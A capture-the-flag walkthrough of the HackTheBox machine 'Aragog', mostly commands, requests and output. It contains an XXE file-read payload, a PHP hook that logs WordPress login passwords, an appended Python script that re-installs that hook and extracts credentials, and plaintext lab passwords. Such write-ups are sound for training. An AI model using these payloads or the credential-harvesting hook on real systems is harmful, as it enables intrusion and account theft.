Port scanning

┌──(mikannse㉿kali)-[~/HTB/aragog]
└─$ sudo nmap --min-rate=10000 -p- 10.10.10.78
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-09 09:55 CST
Nmap scan report for 10.10.10.78
Host is up (0.074s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 8.60 seconds
┌──(mikannse㉿kali)-[~/HTB/aragog]
└─$ sudo nmap -sT -sV -sC -O -p21,22,80 10.10.10.78
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-09 09:56 CST
Nmap scan report for 10.10.10.78
Host is up (0.069s latency).

PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-r--r--r-- 1 ftp ftp 86 Dec 21 2017 test.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.10.14.7
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 ad:21:fb:50:16:d4:93:dc:b7:29:1f:4c:c2:61:16:48 (RSA)
| 256 2c:94:00:3c:57:2f:c2:49:77:24:aa:22:6a:43:7d:b1 (ECDSA)
|_ 256 9a:ff:8b:e4:0e:98:70:52:29:68:0e:cc:a0:7d:5c:1f (ED25519)
80/tcp open http Apache httpd 2.4.18
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Did not follow redirect to http://aragog.htb/
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.2 - 4.9 (96%), Linux 3.16 (95%), Linux 3.18 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.1 (93%), Linux 3.2 (93%), Linux 3.10 - 4.11 (93%), Linux 3.12 (93%), Linux 3.13 (93%), Linux 3.8 - 3.11 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: aragog.htb; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.36 seconds

Add a hosts entry mapping 10.10.10.78 to aragog.htb (the web server redirects there).

XXE

FTP allows anonymous login, and the only file, test.txt, reveals a subnet mask. Directory brute-forcing turns up hosts.php, but neither subdomain enumeration nor fuzzing the parameters of hosts.php gives anything. The number 4294967294 shown on that page is suspicious: it is 2^32 - 2, exactly the usable-host count of an all-zero mask, so the page is almost certainly computing something from an input we have not supplied yet, and test.txt suggests that input is a subnet mask. Posting the contents of test.txt as the request body does change the result:

POST /hosts.php HTTP/1.1
Host: aragog.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Length: 88

<details>
<subnet_mask>255.255.255.192</subnet_mask>
<test></test>
</details>

The page computes the number of hosts in the given subnet mask. Because the body is parsed as XML, try XXE: an external entity pointing at /etc/passwd is resolved and its contents are echoed back in place of the mask.

POST /hosts.php HTTP/1.1
Host: aragog.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Length: 204

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<details>
<subnet_mask>&xxe;</subnet_mask>
<test></test>
</details>

/etc/passwd shows two users with home directories, cliff and florian. Try reading their SSH private keys through the same XXE, the same idea as a THM room I did earlier.

Only florian's key is readable; log in as florian over SSH with it.

Privilege escalation

There is also a WordPress directory under the web root; its database config (wp-config.php) holds the connection credentials:

/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', '$@y6CHJ^$#5c37j$#6h');

The database holds nothing useful: there is an admin user, but its password hash will not crack. Next idea: since the WordPress directory is owned by cliff, write a webshell into it through MySQL (SELECT ... INTO OUTFILE) and use that even without a WordPress login. Unfortunately secure_file_priv is pinned to a specific directory (SELECT @@secure_file_priv shows it), and the slow query log trick is not usable either.

Running pspy shows the following: a root cron job keeps wiping and restoring /dev_wiki, and cliff's wp-login.py runs in between.

2018/05/12 11:15:01 CMD: UID=0 PID=3263 | /usr/sbin/CRON -f
2018/05/12 11:15:01 CMD: UID=0 PID=3262 | /usr/sbin/CRON -f
2018/05/12 11:15:01 CMD: UID=0 PID=3266 | /bin/bash /root/restore.sh
2018/05/12 11:15:01 CMD: UID=0 PID=3265 | /usr/sbin/CRON -f
2018/05/12 11:15:01 CMD: UID=0 PID=3264 | /bin/sh -c /bin/bash /root/restore.sh
2018/05/12 11:15:01 CMD: UID=0 PID=3267 | rm -rf /var/www/html/dev_wiki/
2018/05/12 11:15:01 CMD: UID=1001 PID=3268 | /usr/bin/python /home/cliff/wp-login.py
2018/05/12 11:15:02 CMD: UID=0 PID=3269 | cp -R /var/www/html/zz_backup/ /var/www/html/dev_wiki/
2018/05/12 11:15:02 CMD: UID=1001 PID=3271 | /sbin/ldconfig.real -p
2018/05/12 11:15:02 CMD: UID=1001 PID=3270 | sh -c LC_ALL=C LANG=C /sbin/ldconfig -p 2>/dev/null
2018/05/12 11:15:02 CMD: UID=1001 PID=3272 | sh -c uname -p 2> /dev/null
2018/05/12 11:15:02 CMD: UID=1001 PID=3273 | uname -p
2018/05/12 11:15:02 CMD: UID=0 PID=3274 | chown -R cliff:cliff /var/www/html/dev_wiki/
2018/05/12 11:15:02 CMD: UID=0 PID=3275 | chmod -R 777 /var/www/html/dev_wiki/

/home/cliff/wp-login.py is presumably a script that logs into the WordPress site automatically with cliff's credentials. Since the restore leaves dev_wiki chmod 777, we can modify wp-login.php so that every login request gets written to a file. Keep in mind that the cron job removes and re-copies dev_wiki, so the patched file only survives until the next restore; if the capture file stays empty, check that the modification is still in place.

Append to the bottom of wp-login.php:

<?php
// Dump every request parameter (the username arrives as "log", the
// password as "pwd") and append it to a file we can read as florian.
$rrr = print_r($_REQUEST, true);
$fff = fopen("/dev/shm/df", "a");
fwrite($fff, $rrr);
fclose($fff);

After a while the credentials show up in the capture file:

florian@aragog:/var/www/html/dev_wiki$ cat /dev/shm/df
Array
(
[testcookie] => 1
[pwd] => !KRgYs(JFO!&MTr)lf
[redirect_to] => http://aragog.htb/dev_wiki/wp-admin/
[wp-submit] => Log In
[log] => Administrator
)
Array
(
[redirect_to] => http://aragog.htb/dev_wiki/wp-admin/
[reauth] => 1
)

The password is reused for root: su root with it.
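Added example, not from the write-up: a Python helper that re-applies the hook after each cron restore and parses the print_r() dump into (username, password) pairs. The file paths are the ones used above; the marker comment, the poll interval and the embedded sample dump (constructed from the capture shown above) are mine.

```python
import os
import re
import time

# Paths are the ones in the write-up; the marker and poll interval are mine.
WP_LOGIN = "/var/www/html/dev_wiki/wp-login.php"
CAPTURE = "/dev/shm/df"
MARKER = "/* cred-hook */"
HOOK = (
    f"\n<?php {MARKER}\n"
    "$rrr = print_r($_REQUEST, true);\n"
    f'$fff = fopen("{CAPTURE}", "a");\n'
    "fwrite($fff, $rrr);\n"
    "fclose($fff);\n"
)

# Constructed from the capture shown above, used for the self-test.
SAMPLE = """Array
(
    [testcookie] => 1
    [pwd] => !KRgYs(JFO!&MTr)lf
    [redirect_to] => http://aragog.htb/dev_wiki/wp-admin/
    [wp-submit] => Log In
    [log] => Administrator
)
Array
(
    [redirect_to] => http://aragog.htb/dev_wiki/wp-admin/
    [reauth] => 1
)
"""

ENTRY_RE = re.compile(r"\[(.*?)\] =>\s?(.*)$")


def patch_source(src: bytes) -> bytes:
    """Append the hook unless the marker shows it is already there (idempotent)."""
    return src if MARKER.encode() in src else src + HOOK.encode()


def ensure_hook(path: str = WP_LOGIN) -> bool:
    """Patch wp-login.php on disk; True if it had to be (re)written."""
    with open(path, "rb") as fh:
        src = fh.read()
    patched = patch_source(src)
    if patched == src:
        return False
    with open(path, "wb") as fh:
        fh.write(patched)
    return True


def parse_print_r(dump: str):
    """Split a print_r() dump into one dict per top-level Array. Nested arrays
    are not modelled: their entries land in the enclosing dict, which is fine
    for $_REQUEST."""
    entries, current = [], None
    for raw in dump.splitlines():
        line = raw.strip()
        if line == "Array":
            current = {}
            entries.append(current)
        elif current is not None:
            m = ENTRY_RE.match(line)
            if m:
                current[m.group(1)] = m.group(2)
    return entries


def credentials(dump: str):
    """(username, password) pairs from the requests that carried both fields."""
    return [(e["log"], e["pwd"]) for e in parse_print_r(dump) if "log" in e and "pwd" in e]


if __name__ == "__main__":
    # The cron job rm -rf's dev_wiki and re-copies it, so the hook has to be
    # re-applied after every restore until the login script has fired.
    while True:
        try:
            if ensure_hook():
                print("hook (re)installed")
        except FileNotFoundError:
            pass                          # caught between rm -rf and cp -R
        if os.path.exists(CAPTURE):
            with open(CAPTURE, encoding="utf-8", errors="replace") as fh:
                found = credentials(fh.read())
            if found:
                print(found)
                break
        time.sleep(5)
```

Run it as florian in the background and it exits once a request containing both log and pwd has been captured; the reauth-only request in the second array is ignored.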

Closing notes

XXE for the foothold, then tampering with a world-writable file to harvest credentials.